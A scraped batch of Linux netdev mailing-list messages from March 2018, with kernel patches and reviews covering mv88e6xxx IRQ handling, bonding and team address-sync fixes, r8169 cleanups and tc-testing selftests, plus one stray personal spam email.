 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
index fd78378ad6b1..3ba77067a3dc 100644
--- a/drivers/net/dsa/mv88e6xxx/chip.c
+++ b/drivers/net/dsa/mv88e6xxx/chip.c
@@ -425,7 +425,7 @@ static int mv88e6xxx_g1_irq_setup(struct mv88e6xxx_chip 
*chip)
 
err = request_threaded_irq(chip->irq, NULL,
   mv88e6xxx_g1_irq_thread_fn,
-  IRQF_ONESHOT | IRQF_TRIGGER_FALLING,
+  IRQF_ONESHOT,
   dev_name(chip->dev), chip);
if (err)
mv88e6xxx_g1_irq_free_common(chip);
-- 
2.16.2

[PATCH v3 net-next 0/2] Fixes to allow mv88e6xxx module to be reloaded

2018-03-25 Thread Andrew Lunn

As reported by Uwe Kleine-König, the interrupt trigger is first
configured by DT and then reconfigured to edge. This results in a
failure on EPROBE_DEFER, or if the module is unloaded and reloaded.

A second crash happens on module reload due to a missing call to the
common IRQ free code when using polled interrupts.

With these fixes in place, it becomes possible to load and unload the
kernel modules a few times without it crashing.

v2: Fix the ü in Künig a couple of times
v3: But the ü should be an ö!

Andrew Lunn (2):
  net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
  net: dsa: mv88e6xxx: Call the common IRQ free code

 drivers/net/dsa/mv88e6xxx/chip.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

-- 
2.16.2

Re: [PATCH v2 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode

2018-03-25 Thread Andrew Lunn

On Sun, Mar 25, 2018 at 06:09:11PM -0300, Fabio Estevam wrote:
> Hi Andrew,
> 
> On Sun, Mar 25, 2018 at 5:56 PM, Andrew Lunn  wrote:
> > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING
> > we override the trigger mode provided in device tree. And the
> > interrupt is actually active low, which is what all the current device
> > tree descriptions use.
> >
> > Suggested-by: Uwe Kleine-Künig 
> 
> The correct is König, not Künig.

Arg!

Well, at least i got my locale working correctly!

Andrew

Re: [PATCH net-next 5/6] r8169: change type of driver_data

2018-03-25 Thread Heiner Kallweit

Am 25.03.2018 um 22:43 schrieb David Miller:
> From: Heiner Kallweit 
> Date: Sat, 24 Mar 2018 23:18:25 +0100
> 
>> Several functions accessing the device driver_data field don't need the
>> net_device. All needed parameters can be accessed via struct
>> rtl8169_private, therefore change type of driver_data accordingly.
>>
>> Signed-off-by: Heiner Kallweit 
> 
> This doesn't work.
> 
> The pci_set_drvdata() call happens after register_netdevice().
> 
> At the exact moment register_netdevice() is called, any part of the
> driver can be invoked before it returns.
> 
> Therefore this change will result in crashes because the drvdata won't
> be initialized early enough.
> 
Thanks for catching this. The patch however just changes the parameter
of pci_set_drvdata, not the position of this call.
This means the potential crash scenario we have already w/o the patch
and it's a long-standing bug.

Having said that I'd submit a fix for this bug first and then a
rebased version of the cleanup patch set (if fine with you).

> I really think you're taking things too far with the cleanups of this
> driver.  It is a reasonably old driver used by a lot of people, and I
> think avoiding regressions is 1000 times more important than
> "streamlining" control plane functions that have not effect whatsoever
> on real driver performance.
> 
> Thank you.
>

[RESEND PATCH net-next 1/1] tc-testing: updated police, mirred, skbedit and skbmod with more tests

2018-03-25 Thread Roman Mashak

Added extra test cases for control actions (reclassify, pipe etc.),
cookies, max index value and police args sanity check.

Signed-off-by: Roman Mashak 
---
 .../tc-testing/tc-tests/actions/mirred.json| 192 +
 .../tc-testing/tc-tests/actions/police.json| 144 
 .../tc-testing/tc-tests/actions/skbedit.json   | 168 ++
 .../tc-testing/tc-tests/actions/skbmod.json|  26 ++-
 4 files changed, 529 insertions(+), 1 deletion(-)

diff --git a/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json 
b/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json
index 0fcccf18399b..443c9b3c8664 100644
--- a/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json
+++ b/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json
@@ -171,6 +171,198 @@
 ]
 },
 {
+"id": "8917",
+"name": "Add mirred mirror action with control pass",
+"category": [
+"actions",
+"mirred"
+],
+"setup": [
+[
+"$TC actions flush action mirred",
+0,
+1,
+255
+]
+],
+"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo 
pass index 1",
+"expExitCode": "0",
+"verifyCmd": "$TC actions get action mirred index 1",
+"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to 
device lo\\) pass.*index 1 ref",
+"matchCount": "1",
+"teardown": [
+"$TC actions flush action mirred"
+]
+},
+{
+"id": "1054",
+"name": "Add mirred mirror action with control pipe",
+"category": [
+"actions",
+"mirred"
+],
+"setup": [
+[
+"$TC actions flush action mirred",
+0,
+1,
+255
+]
+],
+"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo 
pipe index 15",
+"expExitCode": "0",
+"verifyCmd": "$TC actions get action mirred index 15",
+"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to 
device lo\\) pipe.*index 15 ref",
+"matchCount": "1",
+"teardown": [
+"$TC actions flush action mirred"
+]
+},
+{
+"id": "9887",
+"name": "Add mirred mirror action with control continue",
+"category": [
+"actions",
+"mirred"
+],
+"setup": [
+[
+"$TC actions flush action mirred",
+0,
+1,
+255
+]
+],
+"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo 
continue index 15",
+"expExitCode": "0",
+"verifyCmd": "$TC actions get action mirred index 15",
+"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to 
device lo\\) continue.*index 15 ref",
+"matchCount": "1",
+"teardown": [
+"$TC actions flush action mirred"
+]
+},
+{
+"id": "e4aa",
+"name": "Add mirred mirror action with control reclassify",
+"category": [
+"actions",
+"mirred"
+],
+"setup": [
+[
+"$TC actions flush action mirred",
+0,
+1,
+255
+]
+],
+"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo 
reclassify index 150",
+"expExitCode": "0",
+"verifyCmd": "$TC actions get action mirred index 150",
+"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to 
device lo\\) reclassify.*index 150 ref",
+"matchCount": "1",
+"teardown": [
+"$TC actions flush action mirred"
+]
+},
+{
+"id": "ece9",
+"name": "Add mirred mirror action with control drop",
+"category": [
+"actions",
+"mirred"
+],
+"setup": [
+[
+"$TC actions flush action mirred",
+0,
+1,
+255
+]
+],
+"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo 
drop index 99",
+"expExitCode": "0",
+"verifyCmd": "$TC actions get action mirred index 99",
+"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to 
device lo\\) drop.*index 99 ref",
+"matchCount": "1",
+"teardown": [
+"$TC actions flush action mirred"
+]
+},
+{
+"id": "0031",
+"name": "Add mirred mirror action with control jump",
+"category": [
+"actions",
+"mirred"
+],
+"setup": [
+[
+"$TC actions flush action mirred",
+0,

Re: [PATCH v2 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode

2018-03-25 Thread Fabio Estevam

Hi Andrew,

On Sun, Mar 25, 2018 at 5:56 PM, Andrew Lunn  wrote:
> By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING
> we override the trigger mode provided in device tree. And the
> interrupt is actually active low, which is what all the current device
> tree descriptions use.
>
> Suggested-by: Uwe Kleine-Künig 

The correct is König, not Künig.

Re: [PATCH net-next,0/2] hv_netvsc: Fix/improve RX path error handling

2018-03-25 Thread David Miller

From: Haiyang Zhang 
Date: Thu, 22 Mar 2018 12:01:12 -0700

> Fix the status code returned to the host. Also add range
> check for rx packet offset and length.

Series applied, thank you.

Re: [PATCH net-next 1/1] tc-testing: Correct compound statements for namespace execution

2018-03-25 Thread David Miller

From: Lucas Bates 
Date: Thu, 22 Mar 2018 15:14:58 -0400

> On Thu, Mar 22, 2018 at 2:48 PM, David Miller  wrote:
>> From: Lucas Bates 
>> Date: Wed, 21 Mar 2018 11:49:40 -0400
>>
>>>  }
>>> -]
>>> \ No newline at end of file
>>> +]
>>> --
>>> 2.7.4
>>
>> Please fix this.
> 
> This patch fixes the gact.json file that had no newline on the end.

Sorry about that, please repost.

Thank you.

Re: [RESEND PATCH net-next 1/1] tc-testing: updated police, mirred, skbedit and skbmod with more tests

2018-03-25 Thread David Miller

From: Roman Mashak 
Date: Thu, 22 Mar 2018 15:29:36 -0400

> David Miller  writes:
> 
>> From: Roman Mashak 
>> Date: Thu, 22 Mar 2018 08:23:22 -0400
>>
>>> diff --git 
>>> a/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json 
>>> b/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json
>>> index 90bba48c3f07..8aa5a88ccb19 100644
>>> --- a/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json
>>> +++ b/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json
>>  ...
>>>  ]
>>>  }
>>> -]
>>> +]
>>> \ No newline at end of file
>>> -- 
>>> 2.7.4
>>
>> Please fix this.
> 
> The patch updates police.json, mirred.json, skbedit.json and
> skbmod.json files that initially had no newline on the end.

My bad, please repost the patch and I'll apply it.

Thank you.

Re: [PATCH] of_net: Implement of_get_nvmem_mac_address helper

2018-03-25 Thread Andrew Lunn

> I have no experience with Coccinelle though.

Hi Mike

I've very little either. But all the interactions i've had with
Coccinelle people have been very friendly and helpful. It could be, if
you can describe in words what you need help with, they can write the
script to do it.

   Andrew

[PATCH v2 net-next 0/2] Fixes to allow mv88e6xxx module to be reloaded

2018-03-25 Thread Andrew Lunn

As reported by Uwe Kleine-Künig, the interrupt trigger is first
configured by DT and then reconfigured to edge. This results in a
failure on EPROBE_DEFER, or if the module is unloaded and reloaded.

A second crash happens on module reload due to a missing call to the
common IRQ free code when using polled interrupts.

With these fixes in place, it becomes possible to load and unload the
kernel modules a few times without it crashing.

v2: Fix the ü in Künig a couple of times

Andrew Lunn (2):
  net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
  net: dsa: mv88e6xxx: Call the common IRQ free code

 drivers/net/dsa/mv88e6xxx/chip.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

-- 
2.16.2

[PATCH v2 net-next 2/2] net: dsa: mv88e6xxx: Call the common IRQ free code

2018-03-25 Thread Andrew Lunn

When free'ing the polled IRQs, call the common irq free code.
Otherwise the interrupts are left registered, and when we come to load
the driver a second time, we get an Opps.

Signed-off-by: Andrew Lunn 
---
 drivers/net/dsa/mv88e6xxx/chip.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
index 3ba77067a3dc..9a5d786b4885 100644
--- a/drivers/net/dsa/mv88e6xxx/chip.c
+++ b/drivers/net/dsa/mv88e6xxx/chip.c
@@ -467,6 +467,8 @@ static int mv88e6xxx_irq_poll_setup(struct mv88e6xxx_chip 
*chip)
 
 static void mv88e6xxx_irq_poll_free(struct mv88e6xxx_chip *chip)
 {
+   mv88e6xxx_g1_irq_free_common(chip);
+
kthread_cancel_delayed_work_sync(&chip->irq_poll_work);
kthread_destroy_worker(chip->kworker);
 }
-- 
2.16.2

[PATCH v2 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode

2018-03-25 Thread Andrew Lunn

By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING
we override the trigger mode provided in device tree. And the
interrupt is actually active low, which is what all the current device
tree descriptions use.

Suggested-by: Uwe Kleine-Künig 
Signed-off-by: Andrew Lunn 
---
v2: Fix the ü in Künig
---
 drivers/net/dsa/mv88e6xxx/chip.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
index fd78378ad6b1..3ba77067a3dc 100644
--- a/drivers/net/dsa/mv88e6xxx/chip.c
+++ b/drivers/net/dsa/mv88e6xxx/chip.c
@@ -425,7 +425,7 @@ static int mv88e6xxx_g1_irq_setup(struct mv88e6xxx_chip 
*chip)
 
err = request_threaded_irq(chip->irq, NULL,
   mv88e6xxx_g1_irq_thread_fn,
-  IRQF_ONESHOT | IRQF_TRIGGER_FALLING,
+  IRQF_ONESHOT,
   dev_name(chip->dev), chip);
if (err)
mv88e6xxx_g1_irq_free_common(chip);
-- 
2.16.2

Re: [v2] vhost: add vsock compat ioctl

2018-03-25 Thread David Miller

From: Stefan Hajnoczi 
Date: Thu, 22 Mar 2018 09:25:35 +

> On Fri, Mar 16, 2018 at 7:30 PM, David Miller  wrote:
>> Although the top level ioctls are probably size and layout compatible,
>> I do not think that the deeper ioctls can be called by compat binaries
>> without some translations in order for them to work.
> 
> I audited the vhost ioctl code when reviewing this patch and was
> unable to find anything that would break for a 32-bit userspace
> process.
> 
> drivers/vhost/net.c does the same thing already, which doesn't prove
> it's correct but makes me more confident I didn't miss something while
> auditing the vhost ioctl code.
> 
> Did you have a specific ioctl in mind?

I walked over the vhost ioctl datastructures and they all appear like
they should be compatible.

So I guess it won't be a problem after all.

Re: [PATCH net-next v6 0/2] net: permit skb_segment on head_frag frag_list skb

2018-03-25 Thread David Miller

From: Yonghong Song 
Date: Wed, 21 Mar 2018 16:31:02 -0700

> One of our in-house projects, bpf-based NAT, hits a kernel BUG_ON at
> function skb_segment(), line 3667. The bpf program attaches to
> clsact ingress, calls bpf_skb_change_proto to change protocol
> from ipv4 to ipv6 or from ipv6 to ipv4, and then calls bpf_redirect
> to send the changed packet out.
>  ...
> 3665 while (pos < offset + len) {
> 3666 if (i >= nfrags) {
> 3667 BUG_ON(skb_headlen(list_skb));
>  ...
> 
> The triggering input skb has the following properties:
> list_skb = skb->frag_list;
> skb->nfrags != NULL && skb_headlen(list_skb) != 0
> and skb_segment() is not able to handle a frag_list skb
> if its headlen (list_skb->len - list_skb->data_len) is not 0.
> 
> Patch #1 provides a simple solution to avoid BUG_ON. If
> list_skb->head_frag is true, its page-backed frag will
> be processed before the list_skb->frags.
> Patch #2 provides a test case in test_bpf module which
> constructs a skb and calls skb_segment() directly. The test
> case is able to trigger the BUG_ON without Patch #1.
> 
> The patch has been tested in the following setup:
>   ipv6_host <-> nat_server <-> ipv4_host
> where nat_server has a bpf program doing ipv4<->ipv6
> translation and forwarding through clsact hook
> bpf_skb_change_proto.

Series applied, however I'm still not %100 convinced that allowing this
kind of protocol and MSS sized mucked GRO packet is a good idea.

hallo Schönheit

2018-03-25 Thread Wesley

Es ist mir eine Freude, Sie kennenzulernen. Mein Name ist Wesley, ich komme aus 
dem Vereinigten Staaten von Amerika. Ich bin ledig und nie verheiratet. Ich 
werde mich gerne mit Ihnen bekannt machen, ich entschuldige mich für Ihre 
Privatsphäre. Ich hoffe, Sie werden freundlich sein genug, um mir mehr über 
dich zu erzählen, wenn es dir nichts ausmacht.

Hoffe bald von dir zu hören.

Grüße,

Wesley.

Re: [PATCH net-next 5/6] r8169: change type of driver_data

2018-03-25 Thread David Miller

From: Heiner Kallweit 
Date: Sat, 24 Mar 2018 23:18:25 +0100

> Several functions accessing the device driver_data field don't need the
> net_device. All needed parameters can be accessed via struct
> rtl8169_private, therefore change type of driver_data accordingly.
> 
> Signed-off-by: Heiner Kallweit 

This doesn't work.

The pci_set_drvdata() call happens after register_netdevice().

At the exact moment register_netdevice() is called, any part of the
driver can be invoked before it returns.

Therefore this change will result in crashes because the drvdata won't
be initialized early enough.

I really think you're taking things too far with the cleanups of this
driver.  It is a reasonably old driver used by a lot of people, and I
think avoiding regressions is 1000 times more important than
"streamlining" control plane functions that have not effect whatsoever
on real driver performance.

Thank you.

Re: [net-next 00/12][pull request] 10GbE Intel Wired LAN Driver Updates 2018-03-23

2018-03-25 Thread David Miller

From: Jeff Kirsher 
Date: Fri, 23 Mar 2018 16:16:19 -0700

> This series contains updates to ixgbe and ixgbevf only.
 ...
> Tony provides the much anticipated XDP support for ixgbevf.  Currently,
> pass, drop and XDP_TX actions are supported, as well as meta data and
> stats reporting.

W00t!

> Björn Töpel tweaks the page counting for XDP_REDIRECT, since a page can
> have its reference count decreased via the xdp_do_redirect() call.
> 
> The following are changes since commit 
> f452518c982e57538e6d49da0a2c80eef22087ab:
>   net: phy: intel-xway: add VR9 v1.1 phy ids
> and are available in the git repository at:
>   git://git.kernel.org/pub/scm/linux/kernel/git/jkirsher/next-queue 10GbE

Pulled, thanks Jeff.

Re: [PATCH v7 6/7] bnxt_en: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Michael Chan

On Sun, Mar 25, 2018 at 7:39 AM, Sinan Kaya  wrote:
> Code includes wmb() followed by writel(). writel() already has a barrier on
> some architectures like arm64.
>
> This ends up CPU observing two barriers back to back before executing the
> register write.
>
> Create a new wrapper function with relaxed write operator. Use the new
> wrapper when a write is following a wmb().
>
> Since code already has an explicit barrier call, changing writel() to
> writel_relaxed().
>
> Also add mmiowb() so that write code doesn't move outside of scope.

This line in the patch description is not needed anymore.  Other than that,

Acked-by: Michael Chan 

Thanks.
>
> Signed-off-by: Sinan Kaya

Re: [PATCH net-next 00/13] liquidio: Tx queue cleanup

2018-03-25 Thread David Miller

From: Felix Manlunas 
Date: Fri, 23 Mar 2018 17:36:18 -0700

> From: Intiyaz Basha 
> 
> Moved some common function to octeon_network.h
> Removed some unwanted functions and checks.

Series applied, thanks.

Re: [PATCH RFC net-next 7/7] netdevsim: Add simple FIB resource controller via devlink

2018-03-25 Thread Jakub Kicinski

On Sun, 25 Mar 2018 08:27:42 -0600, David Ahern wrote:
> On 3/25/18 12:35 AM, Jakub Kicinski wrote:
> > On Sat, 24 Mar 2018 09:02:45 -0600, David Ahern wrote:  
>  diff --git a/drivers/net/netdevsim/Makefile 
>  b/drivers/net/netdevsim/Makefile
>  index 09388c06171d..449b2a1a1800 100644
>  --- a/drivers/net/netdevsim/Makefile
>  +++ b/drivers/net/netdevsim/Makefile
>  @@ -9,3 +9,7 @@ ifeq ($(CONFIG_BPF_SYSCALL),y)
>   netdevsim-objs += \
>   bpf.o
>   endif
>  +
>  +ifneq ($(CONFIG_NET_DEVLINK),)
> >>>
> >>> Hm.  Don't you need MAY_USE_DEVLINK dependency perhaps?
> >>
> >> mlxsw uses CONFIG_NET_DEVLINK in its Makefile.
> >>
> >> MAY_USE_DEVLINK seems to only be used in Kconfig files. Not clear to me
> >> why it is needed at all.  
> > 
> > NETDEVSIM=y && DEVLINK=m
> >   
> 
> ok. I purposely did not add DEVLINK as a dependency to netdevsim to make
> the resource controller truly optional. Can add it if you prefer.

Oh, no, I don't mind.  I just thought NETDEVSIM=y DEVLINK=m case will
break the build, but I haven't tested.  If it works perfect, let's not
add unnecessary dependencies :)

(FWIW the MAY_USE_DEVLINK dep is basically depend on DEVLINK ||
DEVLINK=n, so one can still build without devlink but if devlink is a
module netdevsim will also have to be.)

[PATCH net] team: move dev_mc_sync after master_upper_dev_link in team_port_add

2018-03-25 Thread Xin Long

The same fix as in 'bonding: move dev_mc_sync after master_upper_dev_link
in bond_enslave' is needed for team driver.

The panic can be reproduced easily:

  ip link add team1 type team
  ip link set team1 up
  ip link add link team1 vlan1 type vlan id 80
  ip link set vlan1 master team1

Fixes: cb41c997d444 ("team: team should sync the port's uc/mc addrs when add a 
port")
Signed-off-by: Xin Long 
---
 drivers/net/team/team.c | 12 +---
 1 file changed, 5 insertions(+), 7 deletions(-)

diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
index 56c701b..befed2d 100644
--- a/drivers/net/team/team.c
+++ b/drivers/net/team/team.c
@@ -1197,11 +1197,6 @@ static int team_port_add(struct team *team, struct 
net_device *port_dev)
goto err_dev_open;
}
 
-   netif_addr_lock_bh(dev);
-   dev_uc_sync_multiple(port_dev, dev);
-   dev_mc_sync_multiple(port_dev, dev);
-   netif_addr_unlock_bh(dev);
-
err = vlan_vids_add_by_dev(port_dev, dev);
if (err) {
netdev_err(dev, "Failed to add vlan ids to device %s\n",
@@ -1241,6 +1236,11 @@ static int team_port_add(struct team *team, struct 
net_device *port_dev)
goto err_option_port_add;
}
 
+   netif_addr_lock_bh(dev);
+   dev_uc_sync_multiple(port_dev, dev);
+   dev_mc_sync_multiple(port_dev, dev);
+   netif_addr_unlock_bh(dev);
+
port->index = -1;
list_add_tail_rcu(&port->list, &team->port_list);
team_port_enable(team, port);
@@ -1265,8 +1265,6 @@ static int team_port_add(struct team *team, struct 
net_device *port_dev)
vlan_vids_del_by_dev(port_dev, dev);
 
 err_vids_add:
-   dev_uc_unsync(port_dev, dev);
-   dev_mc_unsync(port_dev, dev);
dev_close(port_dev);
 
 err_dev_open:
-- 
2.1.0

[PATCH net 2/3] bonding: move dev_mc_sync after master_upper_dev_link in bond_enslave

2018-03-25 Thread Xin Long

Beniamino found a crash when adding vlan as slave of bond which is also
the parent link:

  ip link add bond1 type bond
  ip link set bond1 up
  ip link add link bond1 vlan1 type vlan id 80
  ip link set vlan1 master bond1

The call trace is as below:

  [] queued_spin_lock_slowpath+0xb/0xf
  [] _raw_spin_lock+0x20/0x30
  [] dev_mc_sync+0x37/0x80
  [] vlan_dev_set_rx_mode+0x1c/0x30 [8021q]
  [] __dev_set_rx_mode+0x5a/0xa0
  [] dev_mc_sync_multiple+0x78/0x80
  [] bond_enslave+0x67c/0x1190 [bonding]
  [] do_setlink+0x9c9/0xe50
  [] rtnl_newlink+0x522/0x880
  [] rtnetlink_rcv_msg+0xa7/0x260
  [] netlink_rcv_skb+0xab/0xc0
  [] rtnetlink_rcv+0x28/0x30
  [] netlink_unicast+0x170/0x210
  [] netlink_sendmsg+0x308/0x420
  [] sock_sendmsg+0xb6/0xf0

This is actually a dead lock caused by sync slave hwaddr from master when
the master is the slave's 'slave'. This dead loop check is actually done
by netdev_master_upper_dev_link. However, Commit 1f718f0f4f97 ("bonding:
populate neighbour's private on enslave") moved it after dev_mc_sync.

This patch is to fix it by moving dev_mc_sync after master_upper_dev_link,
so that this loop check would be earlier than dev_mc_sync. It also moves
if (mode == BOND_MODE_8023AD) into if (!bond_uses_primary) clause as an
improvement.

Note team driver also has this issue, I will fix it in another patch.

Fixes: 1f718f0f4f97 ("bonding: populate neighbour's private on enslave")
Reported-by: Beniamino Galvani 
Signed-off-by: Xin Long 
---
 drivers/net/bonding/bond_main.c | 73 -
 1 file changed, 35 insertions(+), 38 deletions(-)

diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index 0c299de..55e1985 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -1528,44 +1528,11 @@ int bond_enslave(struct net_device *bond_dev, struct 
net_device *slave_dev,
goto err_close;
}
 
-   /* If the mode uses primary, then the following is handled by
-* bond_change_active_slave().
-*/
-   if (!bond_uses_primary(bond)) {
-   /* set promiscuity level to new slave */
-   if (bond_dev->flags & IFF_PROMISC) {
-   res = dev_set_promiscuity(slave_dev, 1);
-   if (res)
-   goto err_close;
-   }
-
-   /* set allmulti level to new slave */
-   if (bond_dev->flags & IFF_ALLMULTI) {
-   res = dev_set_allmulti(slave_dev, 1);
-   if (res)
-   goto err_close;
-   }
-
-   netif_addr_lock_bh(bond_dev);
-
-   dev_mc_sync_multiple(slave_dev, bond_dev);
-   dev_uc_sync_multiple(slave_dev, bond_dev);
-
-   netif_addr_unlock_bh(bond_dev);
-   }
-
-   if (BOND_MODE(bond) == BOND_MODE_8023AD) {
-   /* add lacpdu mc addr to mc list */
-   u8 lacpdu_multicast[ETH_ALEN] = MULTICAST_LACPDU_ADDR;
-
-   dev_mc_add(slave_dev, lacpdu_multicast);
-   }
-
res = vlan_vids_add_by_dev(slave_dev, bond_dev);
if (res) {
netdev_err(bond_dev, "Couldn't add bond vlan ids to %s\n",
   slave_dev->name);
-   goto err_hwaddr_unsync;
+   goto err_close;
}
 
prev_slave = bond_last_slave(bond);
@@ -1725,6 +1692,37 @@ int bond_enslave(struct net_device *bond_dev, struct 
net_device *slave_dev,
goto err_upper_unlink;
}
 
+   /* If the mode uses primary, then the following is handled by
+* bond_change_active_slave().
+*/
+   if (!bond_uses_primary(bond)) {
+   /* set promiscuity level to new slave */
+   if (bond_dev->flags & IFF_PROMISC) {
+   res = dev_set_promiscuity(slave_dev, 1);
+   if (res)
+   goto err_sysfs_del;
+   }
+
+   /* set allmulti level to new slave */
+   if (bond_dev->flags & IFF_ALLMULTI) {
+   res = dev_set_allmulti(slave_dev, 1);
+   if (res)
+   goto err_sysfs_del;
+   }
+
+   netif_addr_lock_bh(bond_dev);
+   dev_mc_sync_multiple(slave_dev, bond_dev);
+   dev_uc_sync_multiple(slave_dev, bond_dev);
+   netif_addr_unlock_bh(bond_dev);
+
+   if (BOND_MODE(bond) == BOND_MODE_8023AD) {
+   /* add lacpdu mc addr to mc list */
+   u8 lacpdu_multicast[ETH_ALEN] = MULTICAST_LACPDU_ADDR;
+
+   dev_mc_add(slave_dev, lacpdu_multicast);
+   }
+   }
+
bond->slave_cnt++;
bond_compute_features(bond);
bond_set_carrier(bond);
@@ -1748,6 +1746,9 @@ int bond_enslave(struct net_device *bond_dev, stru

[PATCH net 3/3] bonding: process the err returned by dev_set_allmulti properly in bond_enslave

2018-03-25 Thread Xin Long

When dev_set_promiscuity(1) succeeds but dev_set_allmulti(1) fails,
dev_set_promiscuity(-1) should be done before going to the err path.
Otherwise, dev->promiscuity will leak.

Fixes: 7e1a1ac1fbaa ("bonding: Check return of dev_set_promiscuity/allmulti")
Signed-off-by: Xin Long 
---
 drivers/net/bonding/bond_main.c | 5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index 55e1985..b7b1130 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -1706,8 +1706,11 @@ int bond_enslave(struct net_device *bond_dev, struct 
net_device *slave_dev,
/* set allmulti level to new slave */
if (bond_dev->flags & IFF_ALLMULTI) {
res = dev_set_allmulti(slave_dev, 1);
-   if (res)
+   if (res) {
+   if (bond_dev->flags & IFF_PROMISC)
+   dev_set_promiscuity(slave_dev, -1);
goto err_sysfs_del;
+   }
}
 
netif_addr_lock_bh(bond_dev);
-- 
2.1.0

[PATCH net 1/3] bonding: fix the err path for dev hwaddr sync in bond_enslave

2018-03-25 Thread Xin Long

vlan_vids_add_by_dev is called right after dev hwaddr sync, so on
the err path it should unsync dev hwaddr. Otherwise, the slave
dev's hwaddr will never be unsync when this err happens.

Fixes: 1ff412ad7714 ("bonding: change the bond's vlan syncing functions with 
the standard ones")
Signed-off-by: Xin Long 
---
 drivers/net/bonding/bond_main.c | 9 +
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index c669554..0c299de 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -1565,7 +1565,7 @@ int bond_enslave(struct net_device *bond_dev, struct 
net_device *slave_dev,
if (res) {
netdev_err(bond_dev, "Couldn't add bond vlan ids to %s\n",
   slave_dev->name);
-   goto err_close;
+   goto err_hwaddr_unsync;
}
 
prev_slave = bond_last_slave(bond);
@@ -1755,9 +1755,6 @@ int bond_enslave(struct net_device *bond_dev, struct 
net_device *slave_dev,
netdev_rx_handler_unregister(slave_dev);
 
 err_detach:
-   if (!bond_uses_primary(bond))
-   bond_hw_addr_flush(bond_dev, slave_dev);
-
vlan_vids_del_by_dev(slave_dev, bond_dev);
if (rcu_access_pointer(bond->primary_slave) == new_slave)
RCU_INIT_POINTER(bond->primary_slave, NULL);
@@ -1771,6 +1768,10 @@ int bond_enslave(struct net_device *bond_dev, struct 
net_device *slave_dev,
synchronize_rcu();
slave_disable_netpoll(new_slave);
 
+err_hwaddr_unsync:
+   if (!bond_uses_primary(bond))
+   bond_hw_addr_flush(bond_dev, slave_dev);
+
 err_close:
slave_dev->priv_flags &= ~IFF_BONDING;
dev_close(slave_dev);
-- 
2.1.0

[PATCH net 0/3] bonding: a bunch of fixes for dev hwaddr sync in bond_enslave

2018-03-25 Thread Xin Long

This patchset is mainly to fix a crash when adding vlan as slave of
bond which is also the parent link in patch 2/3,  and also fix some
err process problems in bond_enslave in patch 1/3 and 3/3.

Xin Long (3):
  bonding: fix the err path for dev hwaddr sync in bond_enslave
  bonding: move dev_mc_sync after master_upper_dev_link in bond_enslave
  bonding: process the err returned by dev_set_allmulti properly in
bond_enslave

 drivers/net/bonding/bond_main.c | 73 +
 1 file changed, 37 insertions(+), 36 deletions(-)

-- 
2.1.0

Re: [net-next 03/15] net/mlx5e: PFC stall prevention support

2018-03-25 Thread Andrew Lunn

> > Shouldn't you map a value of MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC back to 
> > PFC_STORM_PREVENTION_AUTO?
> 
> We discussed this point internally, mapping MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC 
> (100) to
> PFC_STORM_PREVENTION_AUTO might cause confusion when the user explicitly asks 
> for 100msec timeout
> and gets auto in his following query.
> Also, this way the "auto" timeout is visible to the user, which might help 
> him get an initial
> clue of which values are recommended.

Yes, this is a fair point, which is why i asked the question. Either
way, it can cause confusion. 'I configured it to auto, but it always
returns 100, not auto.'

Whatever is decided, it should be consistent across drivers. So please
add some documentation to the ethtool header file about what is
expected.

Andrew

Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.

2018-03-25 Thread Andrew Lunn

On Sat, Mar 24, 2018 at 09:51:52PM -0700, Richard Cochran wrote:
> On Sat, Mar 24, 2018 at 07:48:58PM +0100, Andrew Lunn wrote:
> > As far as i can see, you have three basic problems:
> > 
> > 1) How do you associate the PTP device to the netdev?
